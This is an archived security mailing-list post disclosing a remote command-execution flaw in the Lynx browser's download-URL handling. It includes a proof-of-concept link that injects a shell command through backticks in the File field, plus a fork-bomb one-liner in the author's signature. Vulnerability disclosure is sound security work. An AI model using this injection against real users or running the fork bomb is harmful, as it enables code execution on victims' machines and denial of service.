While poking around lynx protocol handling routines, I found this very big, ugly remote hole: <a href="LYNXDOWNLOAD://Method=-1/File=`touch%20UGLY_BUG`/SugFile=test"> CLICK HERE </a> It allows remote execution of any code on viewer's machine. Also, by setting 'Method' field to 0 or more, you may crash lynx, but it isn't so exciting as above URL. Also, it's possible to parse /dev/zero as 'File', also not funny. Greetings, _______________________________________________________________________ Michal Zalewski [tel 9690] | finger 4 PGP [lcamtufat_private] Iterowac jest rzecza ludzka, wykonywac rekursywnie - boska [P. Deustch] =--------------- [ echo "\$0&\$0">_;chmod +x _;./_ ] -----------------=
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 13:45:47 PDT